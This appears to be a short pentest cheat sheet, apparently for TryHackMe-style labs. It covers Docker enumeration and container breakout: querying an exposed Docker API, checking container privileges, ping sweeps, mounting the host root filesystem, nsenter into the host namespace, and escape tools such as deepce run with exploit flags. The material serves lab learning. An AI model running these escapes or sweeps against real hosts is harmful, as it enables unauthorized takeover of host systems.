Docker

devops, docker, enum

Overview #

Detection #

Ports #

Network #

Docker API Commands #

# gets docker version
curl http://10.10.198.13:2375/version

# getting list of images via exposed docker tcp socket
docker -H tcp://10.10.198.13:2375 ps

Container Commands #

# are we inside a container?
ls -l /.dockerenv
cat /proc/1/cgroup | grep docker

# check if privileged - you must see host devices
fdisk -l

# check if privileged (looks like these should be seen
# under `Current:` and not on the bounding set)
# - if Capeff is set to all 0's, the container most likely
#   doesn't have much permissions, meaning you can't breakout!
capsh --print | egrep 'cap_(net_admin|sys_module|sys_chroot|sys_admin|sys_time)'

# Use this if `capsh` is not available
# - on attacker machine, get one output and decode it:
#     capsh --decode=<NUMBERS>
#     NOTE: Look at CapPrm and CapEff output
cat /proc/$$/status | grep ^Cap

# Extracting network information
cat /proc/net/tcp
hostname -I
ifconfig
ip a

# Check the available IPs via arp. For example, you can find
# IP addresses of databases using these methods below.
ip neighbor
arp -a
cat /etc/hosts

# Check subnets
cat /proc/net/fib_trie | grep -B1 "32 host LOCAL"

# You can also do ping sweep to see reachable IPs.
for i in {1..254}; do (ping -c 1 172.17.0.${i} | grep "bytes from" | grep -v "Unreachable" &); done;
for i in {1..65535}; do ping -c 1 172.20.0.${i} &> /dev/null && echo "$i: UP"; done

# check if can control docker socket
ls -l /var/run/docker.sock

# check if you can write to the filesystem
echo 1 > /proc/sysrq-trigger

# try to mount host root volume
docker run -v /:/mnt --rm -it alpine chroot /mnt sh

# docker running with --pid=host command? processes
# must be similar to host processes
ps -ef

# use a statically compiled nmap and upload
# /usr/share/nmap inside the container
./nmap --datadir usr/share/nmap -sT -p1-65535 172.20.0.1-10

# enter root namespace and drop to host shell
nsenter --target 1 --mount sh

# create a new namespace mapping root user
unshare -r

# see if you can migrate to another namespace (root namespace?)
nsenter --target 1 --all

# check hardcoded IPs and hostnames
cat /etc/hosts

# check what devices are available and mounted
mount
cat /proc/mounts

Automated tools #

# https://github.com/cdk-team/CDK#installationdelivery
cdk evaluate --full

# https://github.com/PercussiveElbow/docker-escape-tool
./docker_escape check

# https://github.com/stealthcopter/deepce
./deepce.sh
./deepce.sh --no-enumeration --exploit PRIVILEGED --username
./deepce.sh --password deepce

Docker Registries #

# gets images
curl http://docker-rodeo.thm:5000/v2/_catalog

# gets image tags
url http://docker-rodeo.thm:5000/v2/cmnatic/myapp1/tags/list

# inspect image manifest file
curl http://docker-rodeo.thm:5000/v2/cmnatic/myapp1/manifests/latest | grep /root/root.txt

Docker parameters #

# gives full privileges on the host system
--privileged

# removes any security restrictions for the container
--security-opt seccomp=undefined

Tools #

References #